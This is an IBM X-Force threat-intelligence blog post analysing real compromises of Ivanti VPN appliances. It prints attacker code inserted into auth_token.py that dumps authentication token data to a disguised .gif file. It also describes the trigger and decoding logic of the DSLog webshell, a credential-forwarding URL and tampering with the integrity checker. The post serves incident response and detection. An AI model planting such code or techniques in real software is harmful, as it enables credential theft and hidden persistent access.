document.querySelector('.category'); var scrollPosition = window.scrollY; if (scrollPosition >= 0) { category.classList.add('sticky'); } else { category.classList.remove('sticky'); } }); // Function to set the light theme function setLightTheme(event, toSaveLocalStorage = true) { event.preventDefault(); const body = document.body; body.classList.remove('dark-theme'); // Save the user's theme preference in localStorage if (toSaveLocalStorage && !location.href.includes("/x-force/")) { setSiTheme('light'); } } // Function to set the dark theme function setDarkTheme(event, toSaveLocalStorage = true) { event.preventDefault(); const body = document.body; body.classList.add('dark-theme'); // Save the user's theme preference in localStorage if (toSaveLocalStorage && !location.href.includes("/x-force/")) { setSiTheme('dark'); } } // Add click event listeners to the theme links document.getElementById('light-theme-link').addEventListener('click', (event) => setLightTheme(event)); document.getElementById('dark-theme-link').addEventListener('click', (event) => setDarkTheme(event)); // Check localStorage to set the initial theme preference const themePreference = localStorage.getItem('si-theme-mode'); // Function to simulate a click event function simulateClick(handler, toSaveLocalStorage) { const event = new Event('click'); handler(event, toSaveLocalStorage); } // Apply the correct theme based on URL and preference if (location.href.includes("/x-force/")) { simulateClick(setDarkTheme, false); // Apply the dark theme for all x-force posts } else if (themePreference === 'dark') { simulateClick(setDarkTheme, true); // Apply the dark theme based on user preference } else if (themePreference === 'light') { simulateClick(setLightTheme, true); // Apply the light theme based on user preference (default) } else { simulateClick(setLightTheme, true); // Apply the light theme by default } </script> <script> const cookies = 
JSON.parse(localStorage.getItem("truste.eu.cookie.notice_preferences")); if (cookies && cookies.value === '2:') { document.querySelector('.social-container').style.visibility = 'visible'; } </script> </div> <main class="post__content post__content--continue_reading" id="post__content"> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <html><body><p>IBM X-Force has assisted several organizations in responding to successful compromises involving the Ivanti appliance vulnerabilities disclosed in January 2024. Analysis of these incidents has identified several Ivanti file modifications that align with current public reporting. Additionally, IBM researchers have observed specific attack techniques involving the theft of authentication token data not readily noted in current public sources. The blog details the results of this research to assist organizations in protecting against these threats.</p> <h2>Key Findings</h2> <ul type="disc"> <li>IBM research teams have directly observed the DSLog backdoor <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf" target="_blank" rel="noopener nofollow" >reported </a>in active real-world cyber attacks</li> <li>X-Force also identified modifications to the Ivanti “auth_token.py” file to dump authentication token data to another file, presumably for exfiltration–this observation is distinct from other vendors</li> <li>Organizations can leverage several potential data sources when investigating potential Ivanti appliance compromises.</li> </ul> <h2>Overview</h2> <p>IBM X-Force has been monitoring the evolving campaigns leveraging recently disclosed Ivanti zero days. Initial disclosure by Ivanti was published on January 10th, 2024 and detailed CVE-2023-46805 and CVE-2024-21887 impacting Ivanti Connect Secure and Policy Secure appliances. 
CVE-2023-46805 pertains to an authentication bypass vulnerability permitting a remote attacker to access restricted resources. The other vulnerability, CVE-2024-21887, is a remote code execution/injection (RCE) vulnerability permitting an authenticated administrator to execute arbitrary commands by sending specially crafted packets. Public <a href="https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day" target="_blank" rel="noopener nofollow" >reporting</a> indicates a threat actor exploited these vulnerabilities against select targets as early as December 2023.</p> <p>Multiple vendors have attributed the initial intrusions to a suspected Chinese threat actor tracked as UTA0178 (aka UNC5221). X-Force is currently unable to corroborate this reporting with sufficient confidence to comment. On January 11th and 12th, following the publication of these vulnerabilities, <a href="https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/" target="_blank" rel="noopener nofollow" >multiple</a> <a href="https://unit42.paloaltonetworks.com/threat-brief-ivanti-cve-2023-46805-cve-2024-21887/" target="_blank" rel="noopener nofollow" >vendors</a> observed mass scanning and exploitation attempts against various organizations. While UTA0178 was reportedly behind some of this increase in activity, similarities in deployed webshells and non-public methodologies have been reported as evidence that these exploits may have been shared with related <a href="https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/" target="_blank" rel="noopener nofollow" >actors</a>. This proliferation of zero-day exploits similar to the initial campaign/s has been observed in widespread use to opportunistically gain footholds in thousands of organizations before or soon after patches were available. 
This pattern of activity is consistent with prior campaigns also attributed to suspected Chinese threat <a href="https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/" target="_blank" rel="noopener nofollow" >actors</a>.</p> <p>Starting January 16th, proof of concept (POC) exploit code was released for CVE-2023-46805 and CVE-2024-21887. Ivanti disclosed additional vulnerabilities CVE-2024-21893 and CVE-2024-21888 on January 31st for Ivanti Connect Secure, Policy Secure, and ZTA Gateways, with POC exploit code released on February 2nd. CVE-2024-21893 is an SSRF (Server-Side Request Forgery) vulnerability that may permit access to restricted resources without authentication. CVE-2024-21888 is a privilege escalation vulnerability. As of February 8th, Ivanti had identified an additional vulnerability, CVE-2024-22024, which is an XXE vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateways that allows an attacker to access certain restricted resources with authentication.</p> <p><amp-img src="https://images1.cmp.optimizely.com/Zz03ZjVkMmQ3Y2NjNDQxMWVlYmM3MGNhZmQxMGFkODg1Yw==" layout="intrinsic" class="" alt="Major events timeline of Ivanti vulnerabilities" width="720" height="125.23512747875354" lightbox="lightbox"></amp-img><i>(Major Events Timeline of Ivanti Vulnerabilities)</i></p> <h3>Authentication Token Dumper</h3> <p>X-Force identified threat actor modifications to the file auth_token.py to include code designed to dump authentication token data. This file is part of the Python package cav-0.1-py3.6.egg, and is found at the path: <b>/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/auth_token.py</b>. The CAV Python package was also targeted by the FRAMESTING, WIREFIRE, and CHAINLINE webshells <a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation" target="_blank" rel="noopener nofollow" >observed by Mandiant</a>; however, none of those were reported to target authentication tokens. 
Our malware analysis team has independently confirmed these particular webshells are being used in combination with the vulnerabilities included in this report.</p> <p>The following code was inserted into auth_token.py:</p> <p data-pm-slice='1 1 ["bullet_list",null,"bullet_list",null,"list_item",null]'><span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">from</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">datetime import</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">datetime</span><br> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">ctime =</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">datetime.now()</span><br> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">ftime =</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">ctime.strftime(“%Y-%m-%d %H:%M:%S”)</span><br> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">data_save =</span> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">{“time”:ftime,”token_hash”:token_hash,”dsid”: dsid, “roles”: roles, “role_ids”: role_ids,”user_name”: user_name}</span><br> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;">with open(“/home/webserver/htdocs/dana-na/auth/qrcod.gif”,”a”) as f:</span><br> <span style="font-size: 10.5pt; line-height: 107%; font-family: Consolas;"> f.write(f”{data_save}\n”)</span></p> <p>This code is designed to write information about the generated authentication token to the file <b>/home/webserver/htdocs/dana-na/auth/qrcod.gif</b></p> <p>The file used (auth_token.py), functionality of the inserted code, and exfiltration path identified by our researchers differ from those reported by other vendors. 
This may indicate differing tool sets or basic attempts at defense evasion by modifying easily identifiable features used in previous attacks.</p> <h3>DSLog Backdoor</h3> <p>X-Force also identified malicious code for a Perl-based webshell inserted into the legitimate Ivanti file <b>/home/perl/DSLog.pm</b> within a function named <b>Msg</b>, which has been named “DSLog Backdoor” by another <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf" target="_blank" rel="noopener nofollow" >vendor</a>. A snippet of that function can be seen below, and the lines referencing “webshell code” were inserted for clarity.</p> <p data-pm-slice='1 1 ["bullet_list",null,"bullet_list",null,"list_item",null]'><amp-img src="https://images3.cmp.optimizely.com/Zz1jNWEzODZkZWQyNzgxMWVlYmZiMzY2Y2RiMWY0MTRmMg==" layout="intrinsic" class="" alt="Code snippet of the modified Msg function in DSLog.pm" width="546" height="575.5339805825244" lightbox="lightbox"></amp-img></p> <p>When run, the webshell code retrieves the HTTP request string and user agent from environment variables. It then checks the user agent for the string ‘<b>3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6</b>’. As noted in <a href="https://www.orangecyberdefense.com/fileadmin/general/pdf/Ivanti_Connect_Secure_-_Journey_to_the_core_of_the_DSLog_backdoor.pdf" target="_blank" rel="noopener nofollow" >OSINT</a>, X-Force has also observed a SHA256 hash used as a string. If this string is present within the user-agent, the webshell processes the request string, which it expects to be formatted as: <b>&amp;cdi=&lt;hex_formatted_string&gt;</b>. These indicators have also not been identified in previous public reporting.</p> <p>The webshell decodes the hex string to ASCII and performs a further ROT-47 decoding operation. 
It then executes the resulting string using the ‘system’ command.</p> <p>In addition to the activity described above, we also observed malicious files that correspond with those described in existing reporting. These include the following:</p> <ul type="disc"> <li><b>/home/webserver/htdocs/dana-na/auth/lastauthserverused.js</b> – We identified credential harvesting code inserted into this legitimate file, which was similar to that observed by Mandiant (as WARPWIRE) and <a href="https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/" target="_blank" rel="noopener nofollow" >Volexity</a>. The Login function within the <b>lastauthserverused.js</b> file has been modified to forward login credentials as an HTTP POST request to the URL <b>http[:]//www.ehangmun[.]com/board/selectbox/xml.php</b>.</li> <li><b>/home/venv3/lib/python3.6/site-packages/scanner-0.1-py3.6.egg/scanner/scripts/scanner.py</b> – This is a legitimate file and part of the Integrity Checker Tool. The <b>dumpStats</b> function within the file has been modified to always report zero detected changes. Volexity also observed this behavior.</li> <li><b>/home/venv3/lib/python3.6/site-packages/cav-0.1-py3.6.egg/cav/api/resources/visits.py</b> – This is a legitimate file to which webshell code has been added, and is called when the URI /api/v1/cav/client/visits is accessed. This matches the GIFTEDVISITOR webshell reported on by Volexity.</li> </ul> <h3>Ivanti Appliance Investigation Considerations</h3> <p>With regard to Ivanti appliances, after appropriate containment actions have been taken, X-Force recommends organizations leverage the external Ivanti Integrity Check Tool (ICT) to identify potential evidence of compromise. 
The Ivanti ICT is a utility that is designed to check “the integrity of the complete file system and finds any additional/modified file(s)” for ICS and IPS images installed on virtual or hardware appliances, and has been the fastest way to obtain evidence in X-Force’s experience. As noted above and by <a href="https://www.volexity.com/blog/2024/01/18/ivanti-connect-secure-vpn-exploitation-new-observations/" target="_blank" rel="noopener nofollow" >others</a>, threat actors have modified the built-in ICT to hide evidence of changes on Ivanti appliances, so running the external ICT is recommended. The output of that scan comes in the form of a TGZ file that is contained inside an encrypted “format” with a hardcoded key. While X-Force recommends working with Ivanti to decrypt the output, there is code available on <a href="https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605" target="_blank" rel="noopener nofollow" >GitHub </a>that can assist with decrypting these files, should the need arise. Analysis work should involve investigating the TGZ file directly to ensure all relevant information of interest, particularly time stamps, is properly collected.</p> <p>In addition to the Ivanti ICT tool output, organizations can also capture disk/memory images, as well as collect and review the User Access Log, Event Log, and Administrator Access Log files from the Admin Console. Preservation of evidence can be critical in ensuring the complete eviction of malicious actors. When possible, X-Force recommends organizations collect forensic images before remediation actions are taken, including resetting the appliance. Mitigation efforts may alert threat actors to detection and once the appliance is rebuilt, important evidence is lost. This may include critical data necessary to determine what actions the threat actor may have taken if the device was compromised. 
Ivanti support may also be required to decrypt these images for analysis.</p> <h2>Conclusion</h2> <p>Remote access solutions remain an attractive target for threat actors looking to gain a foothold in target environments. For the most recent Ivanti appliance zero-days, X-Force has observed threat actors leverage file modifications to steal authentication token data and deploy the DSLog webshell to conduct post-compromise activity (particularly maintaining persistence, lateral movement, and data exfiltration). X-Force recommends organizations responding to an Ivanti compromise follow the remediation guidance provided by the vendor, while also taking into account forensic collection requirements.</p> <h2>Recommendations</h2> <ul type="disc"> <li>Follow the recommendations noted in the Ivanti Appliance Investigation Considerations section</li> <li>Ensure a backup of the configuration is saved for the appliance before initiating a factory reset</li> <li>Apply official patches from Ivanti to vulnerable appliances</li> <li>Consider revoking and reissuing appliance-related secrets, API keys, and certificates</li> <li>Consider rotating passwords for users who authenticated to the appliance during the timeframe of compromise</li> <li>Forward Ivanti appliance logs to a centralized location to prevent log tampering, particularly the User and Admin Access Logs, and the Event Logs</li> <li>Investigate implementing and/or leveraging a configuration management solution.</li> </ul> <p>An advance copy of this analysis was provided to X-Force Premier Threat Intelligence (PTI) subscription clients on February 7, 2024. 
To learn how you can gain advanced insight into X-Force Threat Intelligence products, try a <a href="https://www.ibm.com/products/xforce-exchange/editions" >30-day free trial</a> of PTI on <a href="https://exchange.xforce.ibmcloud.com/" target="_blank" rel="noopener nofollow" >X-Force Exchange</a>.</p> <p data-pm-slice="1 1 []"><em>To learn how IBM X-Force can help you with anything regarding cybersecurity including incident response, threat intelligence, or offensive security services </em><a href="https://www.ibm.com/account/reg/us-en/signup?formid=urx-52262" target="_blank" rel="noopener nofollow" ><em>schedule a meeting here</em></a><em>.</em></p> <p><em>If you are experiencing cybersecurity issues or an incident, contact </em><a href="https://www.ibm.com/x-force" target="_blank" rel="noopener nofollow" ><em>X-Force</em></a><em> to help: US hotline </em><em>1-888-241-9812</em><em> | Global hotline (+001) </em><em>312-212-8034</em><em>.</em></p> <table class="ScrollTableNormal" style="border-collapse: collapse; border: none;" border="1" cellspacing="0" cellpadding="0"> <thead> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator</span></b></p> </td> <td style="width: 67.7pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: black;">Indicator Type</span></b></p> </td> <td style="width: 157.95pt; border: solid #DDDDDD 1.0pt; border-left: none; background: #F0F0F0; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><b><span style="color: 
black;">Context</span></b></p> </td> </tr> </thead> <tbody> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">336d22d5a85319bf9e2567b3964fdc5a</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified lastauthserverused.js file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">79a1ff16095c2df1356ee9b2d5aeb8b9</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified scanner.py 
file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">094433737d3ff87776c4abae6c91aaaf</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified visits.py file</span></p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">6806d0735c49bd7351dda964e84e2c01</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">Modified auth_token.py file to dump authentication token data</span></p> 
</td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;"><span style="color: #1d1c1d;">ae487dcf9219bab971bdc9d6a4ac7022</span></p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">MD5</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">DSLog Backdoor</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">139.162.152.19</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 
0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">122.167.210.185</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">194.233.171.172</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">Observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.243</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; 
border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.244</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> <tr> <td style="width: 180.5pt; border: solid #DDDDDD 1.0pt; border-top: none; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">178.17.169.233</p> </td> <td style="width: 67.7pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p 
style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IPv4</p> </td> <td style="width: 157.95pt; border-top: none; border-left: none; border-bottom: solid #DDDDDD 1.0pt; border-right: solid #DDDDDD 1.0pt; padding: 1.5pt 1.5pt 1.0pt 1.5pt;" valign="top"> <p style="margin: 0in 0in 6pt; line-height: 107%; font-size: 11pt; font-family: Calibri, sans-serif;">IP belonging to Pure VPN, observed scanning for vulnerable Ivanti appliances</p> </td> </tr> </tbody> </table><div class="table-scroll-help-text"><span>Scroll to view full table </span></div> </body></html> <div id="nc_pixel"></div><div class="post__tags"> <a href="https://securityintelligence.com/tag/application-security/" rel="tag">Application Security</a><span> | </span><a href="https://securityintelligence.com/tag/data-protection/" rel="tag">Data Protection</a><span> | </span><a href="https://securityintelligence.com/tag/data-security/" rel="tag">Data Security</a><span> | </span><a href="https://securityintelligence.com/tag/incident-response-ir/" rel="tag">Incident Response (IR)</a><span> | </span><a href="https://securityintelligence.com/tag/known-vulnerabilities/" rel="tag">Known Vulnerabilities</a><span> | </span><a href="https://securityintelligence.com/tag/security-intelligence-analytics/" rel="tag">security intelligence & analytics</a><span> | </span><a href="https://securityintelligence.com/tag/threat-hunting/" rel="tag">threat hunting</a></div> <div class="post__author author co-authors "> <div class="author__box"> <div class="author__photo" style="background-image: url(https://securityintelligence.com/wp-content/uploads/2020/06/Richard-Emerson.png);"></div> <div class="author__infos"> <div class="author__name"><a href="https://securityintelligence.com/author/richard-emerson/" >Richard Emerson</a></div> <div class="author__role">Cyber Threat Intelligence Analyst</div> </div> </div> <div class="author__box"> <div class="author__photo" style="background-image: 
href="https://www.ibm.com/legal/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US&cm_mc_uid=03001744655915532865554&cm_mc_sid_50200000=84159441565120380187" target="_blank" rel="noopener, noreferrer">Terms of use</a> <a href="https://www.ibm.com/accessibility/?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" rel="noopener, noreferrer">Accessibility</a> <a href="#" onclick="truste.eu.clickListener();return false;" target="_blank" rel="noopener, noreferrer">Cookie Preferences</a> </div> <!-- Sponsor credits --> <div class="utility_bar__sponsor"> <a href="http://ibm.com/security?ce=ISM0484&ct=SWG&cmp=IBMSocial&cm=h&cr=Security&ccy=US" target="_blank" data-icon="B" class="icon ibm" rel="noopener, noreferrer" style="padding-right:0px"> <span>Sponsored by <svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 31.97 14.06"> <defs> <style> .cls-1 { fill: #fff; } </style> </defs> <title>si-icon-eightbarfeature</title> <path class="cls-1" 
d="M27.17,12.6h4.21v.84H27.17Zm0-1.68h4.21v.84H27.17Zm0-1.68h2.52v.84H27.17Zm0-1.69h2.52V8.4H27.17Zm0-1.68h2.52v.84H27.17Zm-.84-4.2.28-.85h4.77v.85Zm-.56,1.68.29-.84h5.32v.84ZM25.22,5l.28-.84h4.19V5Zm-.56,1.68L25,5.87h2.22l-.27.84Zm0,6.73-.28-.84H25Zm-.55-1.68-.29-.84H25.5l-.28.84Zm-.56-1.68-.27-.84H26l-.27.84ZM23,8.4l-.29-.85h3.9l-.28.85Zm-.57-1.69-.27-.84h2.22l.28.84Zm-2.8,2.53h2.53v.84H19.63Zm0-1.69h2.53V8.4H19.63Zm0-1.68h2.53v.84H19.63Zm0-.84V4.19h4.19l.29.84ZM18,12.6h4.21v.84H18Zm0-1.68h4.21v.84H18Zm0-7.57V2.51h5.32l.28.84Zm0-1.68V.82h4.76l.29.85ZM14.16,9.24H17a2.23,2.23,0,0,1,.07.37,2.49,2.49,0,0,1,0,.47H14.16Zm0-5h2.95a2.38,2.38,0,0,1,0,.46A2.18,2.18,0,0,1,17,5H14.16ZM9.11,9.24h2.52v.84H9.11Zm0-1.69H16a5,5,0,0,1,.4.4,2,2,0,0,1,.32.45H9.11Zm0-1.68h7.57a2,2,0,0,1-.32.45,4.89,4.89,0,0,1-.4.39H9.11Zm0-1.68h2.52V5H9.11ZM7.42,12.6H16a3.09,3.09,0,0,1-1,.62,3.73,3.73,0,0,1-1.32.22H7.42Zm0-1.68H17a2.47,2.47,0,0,1-.15.46,2.24,2.24,0,0,1-.21.38H7.42Zm0-8.41h9.22a1.91,1.91,0,0,1,.21.38,2.47,2.47,0,0,1,.15.46H7.42Zm0-1.69H13.6a3.73,3.73,0,0,1,1.32.23,3.09,3.09,0,0,1,1,